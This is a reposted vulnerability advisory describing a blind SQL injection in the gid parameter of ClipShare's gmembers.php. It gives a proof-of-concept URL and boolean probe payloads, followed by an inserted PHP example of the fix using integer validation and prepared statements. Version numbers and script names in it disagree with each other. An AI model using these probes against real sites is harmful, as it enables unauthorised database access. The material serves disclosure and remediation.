Source: 自学PHP网 (zixuephp.com) Date: 2015-04-17 11:59
Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
Author: Esac
Affected software: ClipShare - Video Sharing Community Script 4.1.4
Vendor site: http://www.clip-share.com
All versions are affected
Note: this vulnerability works only if a group has been added to the community
#to exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).
===============================
#Vulnerable script
PHP script : members.php on line 23
============ BEGIN OF gmembers.php =======
execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
    $urlkey  = $rs->fields['gurl'];
    $gname   = $rs->fields['gname'];
    $gupload = $rs->fields['gupload'];
    $oid     = $rs->fields['OID'];
    STemplate::assign('gname', $gname);
    STemplate::assign('gurl', $urlkey);
    STemplate::assign('gupload', $gupload);
} else {
    session_write_close();
    header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
}
...........................................;
...............................................
?>
===================================================================================
PoC:
http://www.2cto.com /mavideo/gmembers.php?gid=6 [Blind SQLi]
Real exploitation :
http://server/mavideo/gmembers.php?gid=6 AND 1=1
==> returns the normal page
http://server/mavideo/gmembers.php?gid=6 AND 1=2
==> returns a page with some errors (or with nothing - a white page)
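As an added defender-side illustration (not ClipShare's code and not part of Esac's advisory): the gid parameter handled the way a page like gmembers.php should handle it. The advisory does not show the statement that builds $sql, so the table and column names, the PDO connection details, and the reuse of ClipShare's STemplate and $config names are assumptions. Validating gid as a positive integer rejects input such as `6 AND 1=2` before any query runs, and binding it through a prepared statement keeps it out of the SQL text, so the boolean test shown above produces the same response either way. magic_quotes_gpc is not a mitigation for a numeric parameter (no quote is needed to inject into it), and the directive was removed in PHP 5.4 anyway.

```php
<?php
// Added example, not ClipShare's code: safe handling of an integer id taken
// from the query string. Table/column names and the PDO DSN are assumptions;
// STemplate and $config['BASE_URL'] are the names used by the original script.

declare(strict_types=1);

/**
 * Validate an id that must be a positive decimal integer.
 * Returns null for anything else, so "6 AND 1=1" style input
 * never reaches the database layer.
 */
function parseGroupId($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Load one group row with a prepared statement. The placeholder keeps the
 * id out of the SQL text entirely, so no escaping (and no magic_quotes_gpc)
 * is involved. Table and column names are assumed for illustration.
 */
function loadGroup(PDO $db, int $gid): ?array
{
    $stmt = $db->prepare(
        'SELECT gurl, gname, gupload, OID FROM groups WHERE gid = :gid LIMIT 1'
    );
    $stmt->bindValue(':gid', $gid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- request handling; mirrors the redirect-on-missing-group branch above ---
$gid = parseGroupId($_GET['gid'] ?? null);
if ($gid === null) {
    http_response_code(400);
    exit('invalid group id');
}

// Assumed connection settings; real server-side prepares, exceptions on error.
$db = new PDO('mysql:host=localhost;dbname=clipshare;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$group = loadGroup($db, $gid);
if ($group === null) {
    session_write_close();
    header('Location: ' . $config['BASE_URL'] . '/error.php?type=group_missing');
    exit;
}

STemplate::assign('gname', $group['gname']);
STemplate::assign('gurl', $group['gurl']);
STemplate::assign('gupload', $group['gupload']);
```

The two checks are independent and both worth keeping: the integer validation gives a clear 400 for malformed input and a cheap place to log probes, while the bound parameter protects the query even if a future edit passes the value in from somewhere other than $_GET.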
--------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz : White Tarbouch Team
./Esac